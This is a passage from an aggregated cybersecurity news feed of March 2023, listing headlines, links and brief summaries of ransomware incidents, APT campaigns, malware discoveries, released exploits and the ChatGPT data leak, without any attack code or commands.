                In its first wave of attacks, the threat actor, which has been dubbed Earth Longzhi, targeted government organizations, infrastructure companies, and healthcare companies in Taiwan, as well as Chinese banks. In the new series of attacks, the attackers used six different backdoors (PortDoor, nccTrojan, Cotx, DNSep, Logtu, and CotSam) at the same time – probably to set up redundant communication channels with infected systems in case one of the malicious programs was removed by an antivirus solution. Cloud Atlas/Inception attacks: Researchers at CheckPoint have observed Cloud Atlas (aka Inception) campaigns focused on very specific targets in Belarus, mainly in the country’s transportation and military radio-electronics sectors, and in Russia, including the government sector, energy and metal industries, since June 2022. Microsoft experts have observed activity targeting employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the USA, UK, India, and Russia. "


                "Bitter" espionage hackers target Chinese nuclear energy orgs

                industry
                2023-03-24 https://www.bleepingcomputer.com/news/security/bitter-espionage-hackers-target-chinese-nuclear-energy-orgs/
                A cyberespionage hacking group tracked as "Bitter APT" was recently seen targeting the Chinese nuclear energy industry using phishing emails to infect devices with malware downloaders. [...] "

                Autosummary: Empty MSI payloads (Intezer). Intezer’s analysts could not retrieve any actual payloads delivered in this campaign but hypothesized that they might include keyloggers, RATs (remote access tools), and info-stealers. "


                OpenAI: ChatGPT payment data leak caused by open-source bug

                exploits
                2023-03-24 https://www.bleepingcomputer.com/news/security/openai-chatgpt-payment-data-leak-caused-by-open-source-bug/
                OpenAI says a Redis client open-source library bug was behind Monday’s ChatGPT outage and data leak, where users saw other users’ personal information and chat queries. [...] "

                Autosummary: Soon after, OpenAI took ChatGPT offline to investigate an issue but did not provide details as to what caused the outage. (Status message during ChatGPT outage.) Open-source library bug behind data leak: Today, OpenAI published a post-mortem report explaining that a bug in the Redis client open-source library caused the ChatGPT service to expose other users’ chat queries and the personal information for approximately 1.2% of ChatGPT Plus subscribers. "


                Procter & Gamble confirms data theft via GoAnywhere zero-day

                exploits
                2023-03-24 https://www.bleepingcomputer.com/news/security/procter-and-gamble-confirms-data-theft-via-goanywhere-zero-day/
                Consumer goods giant Procter & Gamble has confirmed a data breach affecting an undisclosed number of employees after its GoAnywhere MFT secure file-sharing platform was compromised in early February. [...] "

                Autosummary: In the Accellion attacks, Clop stole massive amounts of data and demanded $10 million ransoms from high-profile companies such as energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and universities worldwide (e.g., Stanford Medicine, University of Colorado, and the University of California). "


                UK creates fake DDoS-for-hire sites to identify cybercriminals

                ciber
                2023-03-24 https://www.bleepingcomputer.com/news/security/uk-creates-fake-ddos-for-hire-sites-to-identify-cybercriminals/
                The U.K.’s National Crime Agency (NCA) revealed today that they created multiple fake DDoS-for-hire service websites to identify cybercriminals who utilize these platforms to attack organizations. [...] "

                Autosummary: "Going forward, people who wish to use these services can’t be sure who is actually behind them, so why take the risk?" In December 2022, the U.S. Department of Justice and the FBI announced the seizure of 48 domains that sold "booter" services in the context of "Operation PowerOFF." "


                The Week in Ransomware - March 24th 2023 - Clop overload

                exploits ransomware
                2023-03-24 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-24th-2023-clop-overload/
                This week’s news has been dominated by the Clop ransomware gang extorting companies whose GoAnywhere services were breached using a zero-day vulnerability. [...] "

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @Seifreed, @fwosar, @malwrhunterteam, @LawrenceAbrams, @serghei, @demonslay335, @billtoulas, @PogoWasRight, @cyfirma, @pcrisk, @Trellix, and @jgreigj. "


                Microsoft shares tips on detecting Outlook zero-day exploitation

                exploits
                2023-03-24 https://www.bleepingcomputer.com/news/security/microsoft-shares-tips-on-detecting-outlook-zero-day-exploitation/
                Microsoft today published a detailed guide aiming to help customers discover signs of compromise via exploitation of a recently patched Outlook zero-day vulnerability. [...] "

                Autosummary: "To address this vulnerability, you must install the Outlook security update, regardless of where your mail is hosted (e.g., Exchange Online, Exchange Server, some other platform) or your organization’s support for NTLM authentication," the Microsoft Incident Response team said. "


                City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day

                exploits government
                2023-03-24 https://securityaffairs.com/143938/breaking-news/city-of-toronto-clop-ransomware.html

                Clop ransomware gang added the City of Toronto to the list of its victims; it is another organization compromised through the GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak site. The City was targeted as part of a campaign exploiting the recently disclosed zero-day vulnerability in […]

                The post City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day appeared first on Security Affairs.

                "

                Autosummary: "


                CISA announced the Pre-Ransomware Notifications initiative

                exploits
                2023-03-24 https://securityaffairs.com/143990/security/cisa-pre-ransomware-notifications-intiative.html

                The US Cybersecurity and Infrastructure Security Agency (CISA) announced the Pre-Ransomware Notifications service to help organizations stop ransomware attacks before damage occurs. The US Cybersecurity and Infrastructure Security Agency announced a new Pre-Ransomware Notification initiative that aims at alerting organizations of early-stage ransomware attacks. The principle behind the initiative is simple: ransomware actors initially gain access […]

                The post CISA announced the Pre-Ransomware Notifications initiative appeared first on Security Affairs.

                "

                Autosummary: "


                Smashing Security podcast #314: Photo cropping bombshell, TikTok debates, and real estate scams

                financial government
                2023-03-23 https://grahamcluley.com/smashing-security-podcast-314/
                It could be a case of aCropalypse now for Google Pixel users, there’s a warning for house buyers, and just why is TikTok being singled out for privacy concerns? All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Thom Langford. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Thom Langford – @thomlangford Episode links: Sponsored by: Bitwarden – Password security you can trust. "


                A closer look at TSA’s new cybersecurity requirements for aviation

                ciber
                2023-03-23 https://www.helpnetsecurity.com/2023/03/23/aviation-industry-cybersecurity-requirements/

                The Transportation Security Administration (TSA) recently issued new cybersecurity requirements for the aviation industry, which follows last year’s announcement for railroad operators. Both announcements are part of the Department of Homeland Security’s effort to improve the nation’s cybersecurity resiliency and align with the National Cybersecurity Strategy released by the White House earlier this month. While the strategy is not perfect, it draws attention to the importance of zero trust within our nation’s critical infrastructure. Just … More

                The post A closer look at TSA’s new cybersecurity requirements for aviation appeared first on Help Net Security.

                "

                Autosummary: Within the TSA emergency amendment are four actions that TSA-regulated aviation entities must take to mitigate cybersecurity threats: network segmentation; creation of access control measures; implementation of continuous monitoring and detection; and reduction of the risk of exploited unpatched systems. By constantly verifying and monitoring user and device activity, aviation organizations can achieve a higher level of security and better manage their cyber risk. "


                Cyber threats to EU transport sector sends urgent call for enhanced cybersecurity

                ciber
                2023-03-23 https://www.helpnetsecurity.com/2023/03/23/transport-sector-cyber-threats/

                Between January 2021 and October 2022, the EU Agency for Cybersecurity (ENISA) analyzed and mapped the cyber threats faced by the transport sector, identifying prime threats, analyzing incidents, assessing threat actors, analyzing their motivations, and introducing major trends for each sub-sector, thereby providing new insights. EU Agency for Cybersecurity Executive Director, Juhan Lepassaar, stated that “Transport is a key sector of our economy that we depend on in both our personal and professional lives. Understanding … More

                The post Cyber threats to EU transport sector sends urgent call for enhanced cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Attacks by hacktivists are on the rise. Prime threats identified: ransomware attacks; data related threats; malware; denial-of-service (DoS), distributed denial-of-service (DDoS) and ransom denial-of-service (RDoS) attacks; phishing / spear phishing; supply-chain attacks. Ransomware attacks have become the most prominent threat against the sector in 2022, with attacks having almost doubled, rising from 13% in 2021 to 25% in 2022. "


                Vumetric PTaaS platform simplifies cybersecurity assessments for organizations

                ciber
                2023-03-23 https://www.helpnetsecurity.com/2023/03/23/vumetric-ptaas-platform/

                Vumetric Cybersecurity has launched its Penetration Testing as-a-Service (PTaaS) platform, designed to simplify and modernize cybersecurity assessments for organizations of all sizes. The Vumetric PTaaS platform revolutionizes the penetration testing process by providing self-service capabilities that allow organizations to schedule and manage assessments on-demand. The platform’s interactive reporting provides a comprehensive view of identified risks and prioritized remediation strategies. Stakeholders can easily access results, track improvements over time, and analyze project results without additional effort, … More

                The post Vumetric PTaaS platform simplifies cybersecurity assessments for organizations appeared first on Help Net Security.

                "

                Autosummary: "


                Police swoop across Brazil to crack "kidnap plot"

                latam
                2023-03-23 https://www.bbc.co.uk/news/world-latin-america-65047379?at_medium=RSS&at_campaign=KARANGA
                Former top judge Sergio Moro accuses a crime group of planning to target himself and his family. "

                Autosummary: "


                German and South Korean Agencies Warn of Kimsuky's Expanding Cyber Attack Tactics

                industry
                2023-03-23 https://thehackernews.com/2023/03/german-and-south-korean-agencies-warn.html
                German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS "

                Autosummary: "This threat actor's activities include collecting financial, personal, and client data specifically from academic, manufacturing, and national security industries in South Korea," Google-owned threat intelligence firm Mandiant disclosed last year. "


                Nexus: A New Rising Android Banking Trojan Targeting 450 Financial Apps

                financial exploits
                2023-03-23 https://thehackernews.com/2023/03/nexus-new-rising-android-banking-trojan.html
                An emerging Android banking trojan dubbed Nexus has already been adopted by several threat actors to target 450 financial applications and conduct fraud. "Nexus appears to be in its early stages of development," Italian cybersecurity firm Cleafy said in a report published this week. "Nexus provides all the main features to perform ATO attacks (Account Takeover) against banking portals and "

                Autosummary: Interestingly, the Nexus authors have laid out explicit rules that prohibit the use of its malware in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Uzbekistan, Ukraine, and Indonesia. "


                2023 Cybersecurity Maturity Report Reveals Organizational Unpreparedness for Cyberattacks

                ciber
                2023-03-23 https://thehackernews.com/2023/03/2023-cybersecurity-maturity-report.html
                In 2022 alone, global cyberattacks increased by 38%, resulting in substantial business loss, including financial and reputational damage. Meanwhile, corporate security budgets have risen significantly because of the growing sophistication of attacks and the number of cybersecurity solutions introduced into the market. With this rise in threats, budgets, and solutions, how prepared are industries "

                Autosummary: Finding #2: Tech Companies Score Average. Among sectors, energy and financial industries came out on top for overall cybersecurity maturity level, while healthcare, retail, and government agencies were among the lowest. "


                Dole discloses data breach after February ransomware attack

                financial exploits ransomware
                2023-03-23 https://securityaffairs.com/143902/data-breach/dole-food-company-data-breach.html

                Dole Food Company confirmed that threat actors behind the recent ransomware attack had access to employees’ data. Dole Food Company is an Irish agricultural multinational corporation, it is one of the world’s largest producers of fruit and vegetables, operating with 38,500 full-time and seasonal employees who supply some 300 products in 75 countries. Dole reported 2021 revenues of $6.5 […]

                The post Dole discloses data breach after February ransomware attack appeared first on Security Affairs.

                "

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Dole Food Company) "


                Could the US government actually block people from accessing TikTok altogether?

                government
                2023-03-23 https://www.bbc.co.uk/news/technology-65042762?at_medium=RSS&at_campaign=KARANGA
                The US government is threatening to ban TikTok - how would that work? "

                Autosummary: US influencer Charli D'Amelio would be keen to avoid a ban - she has 150m followers on TikTok. The US government is demanding that TikTok's Chinese owners sell the social media platform, or risk facing a ban. Notably, variants of the app have popped up online, which people can download to their modified devices in order to use it. "


                Windows 11 gets phishing protection boost and SHA-3 support

                financial
                2023-03-23 https://www.bleepingcomputer.com/news/microsoft/windows-11-gets-phishing-protection-boost-and-sha-3-support/
                Microsoft announced that the new Windows 11 build rolling out to Insiders in the Canary channel comes with increased protection against phishing attacks and support for SHA-3 cryptographic hash functions. [...] "

                Autosummary: SHA-3 HMAC algorithms: HMAC-SHA3-256, HMAC-SHA3-384, HMAC-SHA3-512 SHA-3 derived algorithms: extendable-output functions (XOF) (SHAKE128, SHAKE256), customizable XOFs (cSHAKE128, cSHAKE256), and KMAC (KMAC128, KMAC256, KMACXOF128, KMACXOF256). "


                Microsoft fixes Acropalypse privacy bug in Windows 11 Snipping Tool

                exploits
                2023-03-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-acropalypse-privacy-bug-in-windows-11-snipping-tool/
                Microsoft is testing an updated version of the Windows 11 Snipping Tool that fixes a recently disclosed "Acropalypse" privacy flaw that allows the partial restoration of cropped images. [...] "

                Autosummary: In the new Windows 11 Snipping Tool version 11.2302.20.0, when cropping data and overwriting the original file, the software will now correctly truncate the unused data, leaving only one IEND data chunk in the image. "


                Exploit released for Veeam bug allowing cleartext credential theft

                exploits
                2023-03-23 https://www.bleepingcomputer.com/news/security/exploit-released-for-veeam-bug-allowing-cleartext-credential-theft/
                Cross-platform exploit code is now available for a high-severity Backup Service vulnerability impacting Veeam's Backup & Replication (VBR) software. [...] "

                Autosummary: "


                Python info-stealing malware uses Unicode to evade detection

                exploits
                2023-03-23 https://www.bleepingcomputer.com/news/security/python-info-stealing-malware-uses-unicode-to-evade-detection/
                A malicious Python package on PyPI uses Unicode as an obfuscation technique to evade detection while stealing and exfiltrating developers' account credentials and other sensitive data from compromised devices. [...] "

                Autosummary: In the case of onyxproxy, the authors used the identifiers "__import__," "subprocess," and "CryptUnprotectData," which are larger and have a vast number of variants, easily beating string-matching-based defenses. "


                Europe’s transport sector terrorised by ransomware, data theft, and denial-of-service attacks

                exploits ransomware
                2023-03-23 https://www.tripwire.com/state-of-security/europes-transport-sector-terrorised-ransomware-data-theft-and-denial-service
                A new report from ENISA, the European Union Agency for Cybersecurity, looking at cyberattacks targeting the European transport network over a period of almost two years, has identified that ransomware has become the prominent threat. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Nexus, an emerging Android banking Trojan targets 450 financial apps

                financial exploits
                2023-03-23 https://securityaffairs.com/143910/malware/nexus-android-banking-trojan.html

                Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed by multiple groups in attacks against 450 financial applications. The Nexus ransomware was first analyzed in early March by researchers from the […]

                The post Nexus, an emerging Android banking Trojan targets 450 financial apps appeared first on Security Affairs.

                "

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, malware) "


                City of Toronto confirms data theft, Clop claims responsibility

                government
                2023-03-23 https://www.bleepingcomputer.com/news/security/city-of-toronto-confirms-data-theft-clop-claims-responsibility/
                City of Toronto is among Clop ransomware gang's latest victims hit in the ongoing GoAnywhere hacking spree. Other victims listed alongside the Toronto city government include UK's Virgin Red and the statutory corporation, Pension Protection Fund. [...] "

                Autosummary: "We were recently contacted by a ransomware group, calling themselves Cl0p, who illegally obtained some Virgin Red files via a cyber-attack on our supplier, GoAnywhere," a Virgin spokesperson told BleepingComputer. "


                Experts published PoC exploit code for Veeam Backup & Replication bug

                exploits
                2023-03-23 https://securityaffairs.com/143930/hacking/veeam-backup-replication-poc-exploit.html

                Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software. An unauthenticated user with access to the Veeam backup service (TCP 9401 by default) can exploit the flaw to request cleartext credentials. A remote […]

                The post Experts published PoC exploit code for Veeam Backup & Replication bug appeared first on Security Affairs.

                "

                Autosummary: Pierluigi Paganini (SecurityAffairs – hacking, Backup & Replication) "


                Microsoft Teams, Virtualbox, Tesla zero-days exploited at Pwn2Own

                exploits
                2023-03-23 https://www.bleepingcomputer.com/news/security/microsoft-teams-virtualbox-tesla-zero-days-exploited-at-pwn2own/
                During the second day of Pwn2Own Vancouver 2023, competitors were awarded $475,000 after successfully exploiting 10 zero-days in multiple products. [...] "

                Autosummary: On the first day, Pwn2Own competitors were awarded $375,000 and a Tesla Model 3 after successfully demoing 12 zero-days in the Tesla Model 3, Windows 11, Microsoft SharePoint, Oracle VirtualBox, and macOS. "


                Beware: Fake IRS tax email delivers Emotet malware

                exploits
                2023-03-23 https://www.malwarebytes.com/blog/news/2023/03/beware-fake-irs-tax-email-delivers-emotet-malware

                Categories: News

                Tags: emotet

                Tags: malware

                Tags: IRS

                Tags: scam

                Tags: email

                Tags: W-9

                Tags: word

                Tags: document

                Tags: macro

                Tags: macros

                We look at a current tax scam in circulation which looks to make an Emotet deposit on your PC.

                (Read more...)

                The post Beware: Fake IRS tax email delivers Emotet malware appeared first on Malwarebytes Labs.

                "

                Autosummary: Avoiding tax scams. Here are some of the ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks which come around every year during tax season. The email, which contains an attachment and very little text, looks like this: The rather short message reads as follows: Let me know if you would like a hard copy mailed as well. Mostly featuring in email spam campaigns, a big focus of fake mails helping to deliver the infection include subjects like parcel shipping, invoices, and other forms of payment. "


                Zero-day spells disaster for Bitcoin ATM

                financial exploits
                2023-03-23 https://www.malwarebytes.com/blog/news/2023/03/zero-day-grants-big-payday-for-bitcoin-atm-attackers

                Categories: News

                Tags: ATM

                Tags: bitcoin

                Tags: cryptocurrency

                Tags: wallet

                Tags: hot

                Tags: cold

                Tags: 0 day

                Tags: zero day

                We look at a $1.5m heist of cryptocurrency via compromised Bitcoin ATMs.

                (Read more...)

                The post Zero-day spells disaster for Bitcoin ATM appeared first on Malwarebytes Labs.

                "

                Autosummary: It remains to be seen if anyone is able to recover their funds, but losing money in any cryptocurrency scenario is always a very risky business because they are generally, by design, unable to roll back fraudulent transactions. Keeping your hot wallet safe. Your cryptocurrency wallet type is an article all to its own, but in most cases you're going to have a wallet which is hot or cold. As a result, the attacker could send funds from hot wallets, and at least 56 Bitcoins were stolen before we could release the patch. "


                Malware creator who compromised 10,000 computers arrested

                exploits
                2023-03-22 https://www.malwarebytes.com/blog/news/2023/03/creator-of-rat-disguised-as-fake-game-application-arrested

                Categories: News

                Tags: RAT

                Tags: ukraine

                Tags: trojan

                Tags: arrest

                Tags: game

                Tags: application

                Tags: fake

                We take a look at news of an arrest in Ukraine regarding the creator of a remote access trojan.

                (Read more...)

                The post Malware creator who compromised 10,000 computers arrested appeared first on Malwarebytes Labs.

                "

                Autosummary: According to the announcement, the RAT could tell infected devices to: download and upload files, install and uninstall programs, take screenshots, capture sound from microphones, and capture video from cameras. Once data was harvested by the RAT, some of it was put to further use: account theft and withdrawal of electronic funds contained in compromised balances are both mentioned in the police release. "


                CIS expands partnership with Akamai to protect state and local governments

                government
                2023-03-22 https://www.helpnetsecurity.com/2023/03/22/cis-akamai/

                Cyberattacks often begin with an unsuspecting user clicking on a link that redirects them to a harmful site containing malware. Even the best employee training won’t prevent every mistake. The best way to stop those mistakes from becoming costly cyber incidents is to block those sites automatically. Since 2020, The Center for Internet Security (CIS) and Akamai have teamed up to offer Malicious Domain Blocking and Reporting (MDBR), a program that has blocked more than … More

                The post CIS expands partnership with Akamai to protect state and local governments appeared first on Help Net Security.

                "

                Autosummary: "


                Bridging the cybersecurity readiness gap in a hybrid world

                ciber
                2023-03-22 https://www.helpnetsecurity.com/2023/03/22/cybersecurity-readiness-gap/

                A mere 15% of organizations globally have the ‘mature’ level of readiness needed to be resilient against today’s modern cybersecurity risks, according to a Cisco report. Organizations have moved from an operating model that was largely static – where people operated from single devices from one location, connecting to a static network – to a hybrid world in which they increasingly operate from multiple devices in multiple locations, connect to multiple networks, access applications in … More

                The post Bridging the cybersecurity readiness gap in a hybrid world appeared first on Help Net Security.

                "

                Autosummary: Organizations have moved from an operating model that was largely static – where people operated from single devices from one location, connecting to a static network – to a hybrid world in which they increasingly operate from multiple devices in multiple locations, connect to multiple networks, access applications in the cloud and on the go, and generate an enormous amount of data. "


                How to combat hardware Trojans by detecting microchip manipulations

                exploits
                2023-03-22 https://www.helpnetsecurity.com/2023/03/22/hardware-trojans-detecting-microchip-manipulations/

                Not only do security vulnerabilities lurk within software, but they can also be embedded directly into hardware, leaving technical applications open to widespread attack. For their project, the researchers took thousands of microscopic images of microchips. Pictured here is such a chip in a golden chip package. The chip area that was inspected only measures about two square millimeters. Researchers from Ruhr University Bochum, Germany, and the Max Planck Institute for Security and Privacy (MPI-SP) … More

                The post How to combat hardware Trojans by detecting microchip manipulations appeared first on Help Net Security.

                "

                Autosummary: “It’s conceivable that tiny changes might be inserted into the designs in the factories shortly before production that could override the security of the chips,” explains Dr. Steffen Becker and gives an example for the possible consequences: “In extreme cases, such hardware Trojans could allow an attacker to paralyze parts of the telecommunications infrastructure at the push of a button.” The research team has generously made available all chip images, design data, and analysis algorithms online at no cost, enabling fellow researchers to access and utilize these resources for their own investigations and advancements in the field. "


                These 15 European startups are set to take the cybersecurity world by storm

                ciber
                2023-03-22 https://www.helpnetsecurity.com/2023/03/22/european-cybersecurity-google-startups/

                Google has announced the startups chosen for its Cybersecurity Startups Growth Academy. The 15 selected startups are from eight countries and were chosen from over 120 applicants. They have made significant contributions, from securing health applications to protecting educators and safeguarding the clean water supply chain. The selected companies will receive mentoring sessions from Google experts, including former VirusTotal and Mandiant startups. Additionally, they will have opportunities to network with other cybersecurity entrepreneurs at events … More

                The post These 15 European startups are set to take the cybersecurity world by storm appeared first on Help Net Security.

                "

                Autosummary: That’s according to new research we’ve released in partnership with Kantar — “Europe’s SMEs in the Digital Decade 2030” — which also finds that attackers targeting unprepared companies can get more data in less time than ever before, due to the smallest cybersecurity lapses,” Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, wrote in a blog post. (Luxembourg): Company serving 15,000 organizations worldwide — “including F500 companies, the defense industry, universities” — which builds an open-source, enterprise password manager. "


                Rogue NuGet Packages Infect .NET Developers with Crypto-Stealing Malware

                exploits
                2023-03-22 https://thehackernews.com/2023/03/rogue-nuget-packages-infect-net.html
                The NuGet repository is the target of a new "sophisticated and highly-malicious attack" aiming to infect .NET developer systems with cryptocurrency stealer malware. The 13 rogue packages, which were downloaded more than 160,000 times over the past month, have since been taken down. "The packages contained a PowerShell script that would execute upon installation and trigger a download of a " "

                Autosummary: Even more troublingly, the connection to the command-and-control (C2) server occurs over HTTP (as opposed to HTTPS), rendering it vulnerable to an adversary-in-the-middle (AiTM) attack. "


                NAPLISTENER: New Malware in REF2924 Group's Arsenal for Bypassing Detection

                exploits
                2023-03-22 https://thehackernews.com/2023/03/new-naplistener-malware-used-by-ref2924.html
                The threat group tracked as REF2924 has been observed deploying previously unseen malware in its attacks aimed at entities in South and Southeast Asia. The malware, dubbed NAPLISTENER by Elastic Security Labs, is an HTTP listener programmed in C# and is designed to evade "network-based forms of detection." REF2924 is the moniker assigned to an activity cluster linked to attacks against an entity "

                Autosummary: "NAPLISTENER creates an HTTP request listener that can process incoming requests from the internet, reads any data that was submitted, decodes it from Base64 format, and executes it in memory," security researcher Remco Sprooten said. "


                Independent Living Systems data breach impacts more than 4M individuals

                financial
                2023-03-22 https://securityaffairs.com/143832/data-breach/independent-living-systems-data-breach.html

                US health services company Independent Living Systems (ILS) discloses a data breach that impacted more than 4 million individuals. US health services company Independent Living Systems (ILS) disclosed a data breach that exposed personal and medical information for more than 4 million individuals. Independent Living Systems offers a comprehensive range of turnkey payer services including clinical […]

                The post Independent Living Systems data breach impacts more than 4M individuals appeared first on Security Affairs.

                "

                Autosummary: The notice of data breach states that the types of impacted information varies by individual and could have included, name, address, date of birth, driver’s license, state identification, Social Security number, financial account information, medical record number, Medicare or Medicaid identification, CIN#, mental or physical treatment/condition information, food delivery information, diagnosis code or diagnosis information, admission/discharge date, prescription information, billing/claims information, patient name, and health insurance information. "


                PoC exploits released for Netgear Orbi router vulnerabilities

                exploits
                2023-03-22 https://www.bleepingcomputer.com/news/security/poc-exploits-released-for-netgear-orbi-router-vulnerabilities/
                Proof-of-concept exploits for vulnerabilities in Netgear's Orbi 750 series router and extender satellites have been released, with one flaw a critical severity remote command execution bug. [...] "

                Autosummary: The Talos team has also published the following proof of concept (PoC) exploit for the flaw: PoC exploit for CVE-2022-37337 (Cisco) The second problem discovered by Cisco’s analysts is CVE-2022-38452, a high-severity remote command execution vulnerability in the router’s telnet service. "


                CISA Alerts on Critical Security Vulnerabilities in Industrial Control Systems

                industry
                2023-03-22 https://thehackernews.com/2023/03/cisa-alerts-on-critical-security.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released eight Industrial Control Systems (ICS) advisories on Tuesday, warning of critical flaws affecting equipment from Delta Electronics and Rockwell Automation. This includes 13 security vulnerabilities in Delta Electronics' InfraSuite Device Master, a real-time device monitoring software. All versions prior to 1.0.5 are "

                Autosummary: Another set of vulnerabilities relates to Rockwell Automation's ThinManager ThinServer and affects the following versions of the thin client and remote desktop protocol (RDP) server management software: 6.x – 10.x, 11.0.0 – 11.0.5, 11.1.0 – 11.1.5, 11.2.0 – 11.2.6, 12.0.0 – 12.0.4, 12.1.0 – 12.1.5, and 13.0.0 – 13.0.1. The most severe of the issues are two path traversal flaws tracked as CVE-2023-28755 (CVSS score: 9.8) and CVE-2023-28756 (CVSS score: 7.5) that could permit an unauthenticated remote attacker to upload arbitrary files to the directory where the ThinServer.exe is installed. "


                ScarCruft's Evolving Arsenal: Researchers Reveal New Malware Distribution Techniques

                exploits
                2023-03-22 https://thehackernews.com/2023/03/scarcrufts-evolving-arsenal-researchers.html
                The North Korean advanced persistent threat (APT) actor dubbed ScarCruft is using weaponized Microsoft Compiled HTML Help (CHM) files to download additional malware. According to multiple reports from AhnLab Security Emergency response Center (ASEC), SEKOIA.IO, and Zscaler, the development is illustrative of the group's continuous efforts to refine and retool its tactics to sidestep detection. " "

                Autosummary: ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. "


                ENISA: Ransomware became a prominent threat against the transport sector in 2022

                exploits ransomware
                2023-03-22 https://securityaffairs.com/143853/security/enisa-report-transport-sector.html

                The European Union Agency for Cybersecurity (ENISA) published its first cyber threat landscape report for the transport sector. A new report published by the European Union Agency for Cybersecurity (ENISA) analyzes threats and incidents in the transport sector. The report covers incidents in aviation, maritime, railway, and road transport industries between January 2021 and October […]

                The post ENISA: Ransomware became a prominent threat against the transport sector in 2022 appeared first on Security Affairs.

                "

                Autosummary: During the period covered by the report, the expert identified the following prime threats: ransomware attacks (38%), data related threats (30%), malware (17%), denial-of-service (DoS), distributed denial-of-service (DDoS) and ransom denial-of-service (RDoS) attacks (16%), phishing / spear phishing (10%), supply-chain attacks (10%). "


                Experts released PoC exploits for severe flaws in Netgear Orbi routers

                exploits
                2023-03-22 https://securityaffairs.com/143863/hacking/netgear-orbi-routers-flaws.html

                Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business. The Orbi system consists of a main router and one or more satellite units that work together […]

                The post Experts released PoC exploits for severe flaws in Netgear Orbi routers appeared first on Security Affairs.


                Autosummary: Cisco published a proof-of-concept exploit for this issue. Timeline for the issue, which was reported by Dave McDaniel of Cisco Talos: 2022-08-30, initial vendor contact; 2022-09-05, vendor disclosure; 2023-01-19, vendor patch release; 2023-03-21, public release. Two further issues discovered by the researchers are tracked as TALOS-2022-1595 (CVE-2022-38452) and TALOS-2022-1597 (CVE-2022-36429).


                Dole discloses employee data breach after ransomware attack

                financial exploits ransomware
                2023-03-22 https://www.bleepingcomputer.com/news/security/dole-discloses-employee-data-breach-after-ransomware-attack/
                Fresh produce giant Dole Food Company has confirmed that the information of an undisclosed number of employees was accessed during a February ransomware attack. [...]

                Autosummary: Memo Dole sent to American grocery stores (Stewart's). This likely meant that the company would return to manual operations, which would've helped resume production and shipments, although at a much slower pace.


                ChatGPT bug leaked users' conversation histories

                exploits
                2023-03-22 https://www.bbc.co.uk/news/technology-65047304?at_medium=RSS&at_campaign=KARANGA
                Social media users had shared images of chat histories with AI conversations they said were not theirs.



                Eurotech introduces cybersecurity-certified edge AI solutions

                ciber
                2023-03-21 https://www.helpnetsecurity.com/2023/03/21/eurotech-edge-servers/

                Eurotech announced its newest edge servers with scalable, cybersecurity-certified AI capabilities. Cyber-threats have become endemic and severely expose states and businesses of all sizes to the risk of loss of data, interruption of services, and direct or indirect monetary impact. Recent surveys have reported that most enterprises face cyber-attacks repeatedly, breaches often originate from a compromised business partner, and the related costs are passed on to customers. “That is why, after establishing ourselves … More

                The post Eurotech introduces cybersecurity-certified edge AI solutions appeared first on Help Net Security.


                Autosummary: Automotive version available. ReliaCOR 40-12, compact ruggedized fanless edge server: ready for AWS and Azure certification; 12th gen Intel Core low power; up to 3TB SSD storage; 2x Mini PCIe expansion slots; IoT connectivity ready (WiFi/GNSS/BT, 4G/5G cellular). Selection criteria: when workload consolidation is required at the edge in a compact form factor and industrial environmental conditions. ReliaCOR 54-12, ruggedized edge AI server: 12th gen Intel Core high performance; up to 3TB SSD storage; 2x Mini PCIe + 3x PCIe expansion slots; up to 2x NVIDIA latest gen GPU; IoT connectivity ready (WiFi/GNSS/BT, 4G/5G cellular). Selection criteria: when workload consolidation meets AI and machine vision at the edge in industrial environmental conditions, and requires scalability to accommodate evolving use cases. On all Eurotech’s ReliaCOR products, unauthorized accesses and data manipulations are prevented by a layered secure architecture.


                Clop ransomware claims Saks Fifth Avenue, retailer says mock data stolen

                exploits ransomware
                2023-03-21 https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-saks-fifth-avenue-retailer-says-mock-data-stolen/
                The Clop ransomware gang claims to have attacked Saks Fifth Avenue on its dark web leak site. Saks admits the incident is linked to the ongoing GoAnywhere MFT software exploits but states that no real customer data was stolen. [...]

                Autosummary: Clop on a GoAnywhere exploit spree: Yesterday, the Clop ransomware gang listed "Saks Fifth Avenue" on its data leak website among its latest victims, as seen by BleepingComputer (image: Cl0p ransomware claims to have attacked Saks Fifth Avenue). The threat actor has not yet disclosed any additional information, such as what data it stole from the luxury brand retailer's systems, or details about any ongoing ransom negotiations.


                From Ransomware to Cyber Espionage: 55 Zero-Day Vulnerabilities Weaponized in 2022

                exploits ransomware
